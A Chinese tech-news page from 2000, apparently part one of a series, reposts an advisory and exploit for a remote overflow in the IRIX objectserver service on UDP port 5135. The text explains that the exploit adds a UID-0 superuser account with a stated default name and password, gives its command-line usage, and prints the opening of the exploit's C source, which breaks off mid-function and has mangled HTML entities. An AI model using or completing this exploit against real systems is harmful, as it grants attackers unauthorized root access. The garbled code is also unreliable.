Irix Objectserver溢出漏洞<一>

（2000-06-02 00:00 ）（不详）（京九网联）

导读-- 下面的漏洞程序将导致IRIX objectserver(udp端口为5135)远程溢出。可以运行远程添加用户帐号.......

font color="#000000">漏洞发布时间：2000-03-28漏洞描述:

下面的漏洞程序将导致IRIX objectserver(udp端口为5135)远程溢出。可以运行远程添加用户帐号。
如下面的"account"帐号。在IRIX 5.2, 5.3, 6.0.1, 6.1甚至6.2系统上测试通过。

该程序默认添加的帐号是lsd，默认的密码为：m4c10r4!
默认的用户目录是：/tmp/.new 默认的用户ID是0，也就是说是超级用户。
编译为ob_account二进制文件后，用法如下：
# ob_account ipaddr [-u username] [-i userid] [-p]
参数用法如下：
-i 自定用户ID(非0的ID)
-u 自定用户名称
-p 自动探测是否objectserver运行在服务器上

漏洞检测程序如下：

/* Copyright (c) July 1997 Last Stage of Delirium */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */
/* Last Stage of Delirium */
/* */
/* The contents of this file may be disclosed to third */
/* parties, copied and duplicated in any form, in whole */
/* or in part, without the prior written consent of LSD. */

#include $#@60;sys/types.h$#@62;
#include $#@60;sys/socket.h$#@62;
#include $#@60;netinet/in.h$#@62;
#include $#@60;arpa/inet.h$#@62;
#include $#@60;netdb.h$#@62;
#include $#@60;sys/uio.h$#@62;
#include $#@60;errno.h$#@62;
#include $#@60;stdio.h$#@62;
#define E if(errno) perror("");

struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;

void show_msg(){
char *p,*p1;
int i,j,c,d;

c=0;
printf("%04x ",iov[0].iov_len);
p=(char*)iov[0].iov_base;
for(i=0;i$#@60;iov[0].iov_len;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j$#@60;16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c$#@62;1){
for(i=0;i$#@60 6-c);i++) printf(" ");
for(i=0;i$#@60;c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
if(msg.msg_iovlen!=2) return;

责编：

（订阅新闻邮件）（推荐）（打印）（关闭页面）（至顶）（我对此感兴趣）

天极社区邀请您：写博客日记上传相片论坛聊天订阅电子杂志彩信蚂蚁推荐网摘

请您注意：

　遵守国家有关法律、法规，尊重网上道德，承担一切因您的行为而直接或间接引起的法律责任。

　天极网拥有管理笔名和留言的一切权利。